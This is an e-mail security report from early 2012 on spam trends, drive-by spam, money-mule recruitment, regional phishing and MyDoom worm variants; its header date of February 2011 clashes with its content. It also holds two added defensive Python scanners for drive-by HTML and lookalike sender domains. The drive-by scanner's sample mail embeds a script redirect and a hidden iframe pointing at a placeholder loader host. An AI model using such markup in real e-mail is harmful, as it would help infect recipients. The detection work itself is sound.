eleven E-mail Security Reports
eleven E-mail Security Report – February 2011
08.02.12
Spam Levels
Spam levels reached a new peak in November 2011, the highest since the takedown of the world’s largest botnet, Rustock, on March 16, 2011; they then fell in December 2011 to their lowest value since early 2007. Spam levels dropped by 70.3% in December and then rose slightly, by 9.7%, in January, leaving them 61.2% below the value of the same month in the previous year.
These events continued the extremely volatile spam trend that characterized 2011. Spam volumes have never fluctuated so strongly since eleven began monitoring spam in 2003. Spam levels rose and fell by considerably more than 50%, for example in January 2011, following a massive decline the month before, and most recently in the decline of last December. The most significant event was the Rustock botnet takedown in March 2011, after which spam volumes declined by more than 60% within a few hours. The renewed increase in August also took place within a short period. The sending pattern for spam changed as well: casino spam, which dominated the second half of the year, was sent in short but massive waves. Spam levels briefly multiplied several times, only to decline again just as rapidly.
As a consequence of the drop in spam, spam’s share of all e-mail volume fell from 90.25% to 74.8% between November and December 2011; in January it was 75.1%. The share of “clean” e-mails was 17.0% in January, legitimate bulk e-mails (such as newsletters) comprised 5.7%, and malware e-mails accounted for 0.2%.
The main factor behind the massive decline in spam was casino e-mail, which had also been the cause of the renewed spam growth since August 2011. The last major waves appeared in late November 2011; since then, larger casino e-mail waves have stalled. Longer pauses between casino spam waves have always been normal, but they have never lasted more than two weeks. At the same time, the spam decline resembles last year’s pattern: spam volumes fell to about one fourth in mid-December, only to return to their starting value in mid-January. It remains to be seen whether the current pause will follow the same pattern, even though it has already lasted longer.
Spam Topics
Advertising e-mails for online casinos, which had dominated the spam landscape since May 2011, declined significantly in December and January. Although they comprised 69.1% of all spam messages in November 2011, their share was only 7.5% by January 2012. That took casino spam from first to fourth place in the list of most important spam topics. The most prevalent spam topic was pharmaceuticals with 26.0%, a long-term frontrunner and number one for the first time since May 2011. That percentage, though, is still considerably lower than the value before the Rustock botnet shutdown: in the same period of the previous year its share was still 64%.
The up-and-coming topic in December and January was fake luxury goods, which came in second with 23.2%; that share had been a meager 1.8% (fourth place) in November. Dating spam came in third with 8.1%, followed by online casinos (7.5%) and job offers (5.5%). Dating spam and job offers both significantly increased their shares compared with November, when they had been at only 2.3%.
Countries of Origin
The decline in December also had a noticeable impact on the geographic distribution of spam e-mails. While India retained its top position with 11.7%, Brazil slipped from second to fifth place: in January only 5.1% of all spam e-mail came from the South American country, compared with 11.2% in November. Vietnam also dropped from fourth place (8.9%) to seventh (4.2%). The new runner-up was Indonesia with 7.9%, followed by Russia with 7.2%. The top ten spam senders are dominated by Asia and Eastern Europe: five Asian countries sit alongside four Eastern European ones, with Brazil the only exception.
By contrast, the share of spam from the Western European industrial countries, which had played a key role in spam propagation up to the Rustock takedown, increased. The long-term frontrunner, the USA, came in eleventh in January with a 2.5% share (November: 14th, 1.3%). Along with Spain (15th, 2.9%), Germany reappeared in the top 20: in November it had been 30th with 0.6%, and in January 2012 it came in 19th with 1.3%, more than doubling its share of overall spam volume within two months.
Spam Trends
The most important – because most dangerous – spam trend was what is known as drive-by spam: e-mails that automatically load malware onto a computer as soon as the message is opened or displayed in an e-mail program. They are written in HTML and contain JavaScript that fetches malware as soon as the message is rendered. Drive-by spam works like drive-by downloads, in which manipulated Web sites infect computers with malware as soon as a page is opened in a browser. Drive-by spam removes the additional detour via an embedded link or an attachment, and so endangers even vigilant users who do not open unknown attachments or click on such links.
For drive-by spam to work, the e-mail program must be configured to display HTML content and to allow content to be downloaded from the Internet. These functions are turned off in the default settings of the latest versions of popular e-mail clients such as Microsoft Outlook or Thunderbird. Users of older clients and of several Web mail services, however, are at much higher risk. Caution is also required when HTML content is not displayed: in that case the dangerous HTML document arrives as an e-mail attachment, and if it is opened, the infection runs via the Web browser. The trick is not entirely new, but January was the first time it was used on a large scale: the share of drive-by spam rose by 1,225% compared with December 2011. At 0.2% of all e-mail, it has reached a significant size.
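As an added example (not code from the eleven report), the following Python scanner applies the defensive checks implied by the two paragraphs above: it walks a MIME message, flags script tags, inline event handlers and remote resource loads in the HTML body, and flags HTML documents sent as attachments. The sample message, the `.invalid` host names and the finding labels are constructed for this illustration.

```python
from email.message import EmailMessage
from html.parser import HTMLParser

# Tags whose listed attribute makes the client fetch (and, for script and
# iframe, execute or render) content as soon as the HTML is displayed.
REMOTE_LOAD_ATTRS = {
    "script": ("src",), "iframe": ("src",), "frame": ("src",),
    "img": ("src",), "embed": ("src",), "object": ("data",),
    "link": ("href",),
}
# Findings that indicate active content rather than a passive fetch.
ACTIVE_PREFIXES = ("script-tag", "event-handler", "remote-load:script",
                   "remote-load:iframe", "remote-load:frame",
                   "remote-load:object", "remote-load:embed", "html-attachment")


class _HtmlAudit(HTMLParser):
    """Collects drive-by indicators from an HTML body."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self.findings.append("script-tag")
        for name in attrs:
            if name.startswith("on"):  # onload=, onerror=, ...
                self.findings.append(f"event-handler:{name}")
        for name in REMOTE_LOAD_ATTRS.get(tag, ()):
            url = attrs.get(name, "").strip().lower()
            if url.startswith(("http://", "https://", "//")):
                self.findings.append(f"remote-load:{tag}={url}")


def audit_html(html: str) -> list:
    parser = _HtmlAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


def audit_message(msg: EmailMessage) -> list:
    """Walk all MIME parts; audit HTML bodies and flag HTML attachments."""
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        filename = (part.get_filename() or "").lower()
        if part.get_content_disposition() == "attachment" and (
                ctype == "text/html" or filename.endswith((".htm", ".html"))):
            findings.append(f"html-attachment:{filename or 'unnamed'}")
        elif ctype == "text/html":
            findings.extend(audit_html(part.get_content()))
    return findings


def classify(findings: list) -> str:
    """drive-by-candidate: active content or HTML attachment present;
    remote-content: only passive fetches (tracking images, stylesheets);
    clean: nothing of note."""
    if any(f.startswith(ACTIVE_PREFIXES) for f in findings):
        return "drive-by-candidate"
    if findings:
        return "remote-content"
    return "clean"


def build_sample() -> EmailMessage:
    """Constructed sample mail: HTML body with a script, a tracking image and
    a hidden iframe, plus an HTML attachment. Hosts are .invalid placeholders."""
    msg = EmailMessage()
    msg["From"] = "offers@sender.invalid"
    msg["To"] = "user@recipient.invalid"
    msg["Subject"] = "Your order"
    msg.set_content("Plain-text fallback.")
    msg.add_alternative(
        '<html><body><p>Hello</p>'
        '<img src="http://cdn.sender.invalid/t.gif">'
        '<script>window.location="http://loader.invalid/";</script>'
        '<iframe src="//loader.invalid/load" width="1" height="1"></iframe>'
        '</body></html>',
        subtype="html")
    msg.add_attachment("<html><script>alert(1)</script></html>",
                       subtype="html", filename="details.html")
    return msg


if __name__ == "__main__":
    found = audit_message(build_sample())
    print(classify(found), found)
```

The scanner deliberately separates passive remote fetches (a tracking image) from active content (script, iframe, event handlers, HTML attachments), because the former is common in legitimate newsletters while the latter is what the drive-by technique depends on.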
The eleven research team observed significant professionalization in job-offer spam, which still mainly recruits so-called “money mules” for money laundering. Spammers have evidently recognized that an e-mail with a promise and a free Web mail address as the sender are no longer enough. A large number of legitimate-sounding domains were registered without any content being placed on them; they served only to set up e-mail addresses. A return address at the fictitious “Walter-Group.com” naturally looks far more legitimate than application@hotmail.com.
“Money mules” are evidently in greater demand than ever, since the scammers do everything to appear to be genuine job brokers. Besides a good income, the e-mails explicitly state that the position offered does not violate German or EU law. A particularly elaborate masquerade was discovered in January: with a slightly modified text, a job agency was seeking staff. The ad sounds as well-meaning as ever: “We are looking for a company representative in Germany and the Netherlands,” or “Personnel agency is looking for a manager for an English company in German,” with a salary starting at €1,500 per month for three hours of work a day. The reply address is “…@smartsr.com.” Loading the Web site actually leads to a recruitment agency site; as is so often the case, the spammers copied a large part of an original Web site. In this case, though, the spammers seem to have missed some details: a check of whether the mail server accepts all the e-mail addresses given produced some rejections.
Phishing
Phishing e-mails grew explosively in December 2011 and January 2012: their volume rose by 194% in December and by a further 214% in January. The trend toward regionalized phishing campaigns, which target German-speaking users, for instance, continued. The eleven research team again observed numerous campaigns written in good German that purported to come from regional companies such as banks. Phishers thereby achieve a considerably better “success rate,” because a German user is far more likely to open a supposed e-mail from a German bank than one from a foreign credit institution.
Postbank customers were once again the target in January. This time the phishing e-mail arrived without graphic elements but with very direct instructions: “Click here to solve the problem,” the problem being that the account had been “restricted.” The sender was, for example, sec@postank.de. The link in the e-mail leads to a Web site that copies the Postbank log-in page (Postbank online banking), including the new log-in introduced in October 2011. As in many of these fraud cases, the page is passed off as a “normal” Web site: most of it was again copied from the original, and only the entries and links directly beneath the input fields were changed. Once a user enters an account number and PIN, he is taken to a second site. Its layout is considerably less professional, but at least the Postbank colors are used. There the user is asked to enter last name, first name, date of birth, and phone number.
The campaign reflects several current phishing trends. First, regionalization of sender and language: when German e-mails are sent to German recipients in the name of Postbank, the probability of reaching actual Postbank customers is relatively high. Second, the subject line creates pressure: phishers like to work with allegedly blocked accounts to frighten recipients, hoping that fear makes them less careful and leads them to enter information they otherwise would not. Third, a small error is often built into the sender address (such as the missing “b” in “postank”) that users overlook at first glance, so they take the sender to be legitimate.
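An added example (again not the report’s own code) showing how the third point, lookalike sender domains such as postank.de, can be checked mechanically on the receiving side, together with the pressure wording from the second point. The list of protected brand domains, the pressure phrases and the sample headers are constructed assumptions for this illustration; a real gateway would take the domain list from its configuration.

```python
from email.utils import parseaddr

# Constructed reference list: the legitimate domains of the brands to protect.
KNOWN_BRAND_DOMAINS = ("postbank.de", "amazon.de", "facebook.com")

# Constructed list of "account blocked" pressure phrases (English and German).
PRESSURE_PHRASES = ("blocked", "restricted", "suspended", "gesperrt",
                    "eingeschränkt", "click here to solve")


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute cost 1 each)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(from_header: str) -> str:
    """Domain of the address in a From: header; the display name is ignored."""
    _, addr = parseaddr(from_header)
    return addr.rpartition("@")[2].lower()


def lookalike_of(domain: str, known=KNOWN_BRAND_DOMAINS, max_distance: int = 2):
    """Return (legitimate_domain, reason) if `domain` imitates a known brand,
    or None if it is the brand itself, one of its subdomains, or unrelated."""
    for k in known:
        if domain == k or domain.endswith("." + k):
            return None
    best = None
    for k in known:  # near-misses such as postank.de or amaz0n.de
        d = levenshtein(domain, k)
        if 0 < d <= max_distance and (best is None or d < best[1]):
            best = (k, d)
    if best:
        return best[0], f"edit-distance={best[1]}"
    for k in known:  # brand label inside an unrelated domain, e.g. postbank-sicherheit.net
        brand = k.split(".")[0]
        if brand in domain:
            return k, "brand-label-embedded"
    return None


def mentions_pressure(subject: str) -> bool:
    s = subject.lower()
    return any(p in s for p in PRESSURE_PHRASES)


def assess(from_header: str, subject: str) -> dict:
    """Combine the two signals into a verdict for the mail."""
    domain = sender_domain(from_header)
    look = lookalike_of(domain)
    pressure = mentions_pressure(subject)
    if look and pressure:
        verdict = "phishing-suspect"
    elif look:
        verdict = "lookalike-sender"
    elif pressure:
        verdict = "review"
    else:
        verdict = "ok"
    return {"domain": domain, "lookalike": look, "pressure": pressure, "verdict": verdict}


if __name__ == "__main__":
    # Constructed headers modelled on the campaign described above.
    for frm, subj in [
        ("Postbank <sec@postank.de>", "Your account has been restricted"),
        ("Postbank <service@postbank.de>", "Monthly newsletter"),
        ("Amazon <no-reply@amaz0n.de>", "Unauthorized activity detected"),
    ]:
        print(assess(frm, subj))
```

The edit-distance threshold of 2 is a trade-off: it catches single-character omissions and digit substitutions without flagging unrelated short domains, and the brand-label check covers the other common pattern, a genuine brand name embedded in a foreign registrable domain.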
Another trend is that the range of phishing topics keeps expanding. Besides banks, phishers increasingly focus on online services such as Amazon or Facebook. The eleven research team found one example in December 2011: the e-mails claimed that the recipient’s Amazon account had been blocked because of unauthorized activity. To reactivate the account, recipients were asked to enter their credit card details on a Web site designed to resemble Amazon’s, but which had of course been manipulated. Both the three-digit verification code and the 3-D Secure code were requested, a combination that never occurs in legitimate cases. The phishers’ targets also include log-in data for e-mail accounts, which can then be used to send spam, and for Web hosting accounts, where spam and phishing sites can then be hosted.
Malware
Malware volumes increased by 8.0% in January 2012, and the number of new, previously unknown virus outbreaks by 6.5%. China was again the largest sender of known malware with 29.4%, followed by Bangladesh with 13.8% and spam frontrunner India with 10.1%. Germany is again one of the major sources of malware e-mails and came in seventh in January (3.1%). In terms of virus outbreaks, Italy came in first with 10.7%, followed by the USA (7.5%) and Vietnam (6.3%); Germany came in eighth with 3.7%.
Whereas Trojans dominated the malware landscape in 2011, variants of a long-known e-mail worm moved to the forefront at the turn of the year. Several modifications of the MyDoom worm accounted for some 65% of all virus e-mails in December 2011 and January 2012. MyDoom is one of the most widely distributed malware families. The first known version (MyDoom.A) appeared in 2004 and installed a back door in Windows systems, giving attackers undetected access and full control over all functions of the infected system; sending spam or logging keystrokes are only two of many possibilities. The virus senders are now using the worm in slightly modified form: first, the damage routines are changed or adapted in response to security software; then random modifications are made to deceive simple virus scanners. Numerous variants have since appeared. MyDoom.L, MyDoom.M, and MyDoom.O were among the most widely disseminated viruses and worms in January.